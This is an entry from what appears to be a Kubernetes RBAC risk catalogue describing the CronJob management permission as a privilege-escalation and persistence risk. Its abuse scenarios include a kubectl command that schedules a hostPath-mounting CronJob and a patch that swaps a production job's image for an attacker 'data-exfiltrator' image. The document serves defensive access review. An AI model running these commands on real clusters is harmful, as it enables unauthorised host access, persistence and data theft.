Manage CronJobs in a namespace (scheduled privileged execution, persistence)
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1040 |
| Name | Manage CronJobs in a namespace (scheduled privileged execution, persistence) |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | batch |
| Resources | cronjobs |
| Verbs | create, update, patch, delete |
| Tags | Persistence PotentialPrivilegeEscalation Tampering WorkloadLifecycle |
Description
Grants permission to create, update, or delete CronJobs within a specific namespace. This can be used to schedule the execution of potentially privileged pods, enabling privilege escalation, persistence, and tampering within that namespace.
Abuse Scenarios
- Create a new CronJob with a hostPath mount in the namespace.
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: CronJob
metadata:
name: hostpath-cronjob
spec:
schedule: "*/5 * * * *" # Every 5 minutes
jobTemplate:
spec:
template:
spec:
containers:
- name: hostpath-container
image: busybox
command: ["/bin/sh", "-c", "echo 'Hello from cronjob' >> /host-var/log/cron.log"]
volumeMounts:
- mountPath: /host-var
name: host-var
volumes:
- name: host-var
hostPath:
path: /var
restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Update an existing CronJob’s image to a malicious one.
kubectl patch cronjob <cronjob-name> -n <namespace> --type='json' -p='[{"op": "replace", "path": "/spec/jobTemplate/spec/template/spec/containers/0/image", "value": "attacker/malicious-job"}]'
# Example: kubectl patch cronjob data-sync -n production --type='json' -p='[{"op": "replace", "path": "/spec/jobTemplate/spec/template/spec/containers/0/image", "value": "attacker/data-exfiltrator"}]'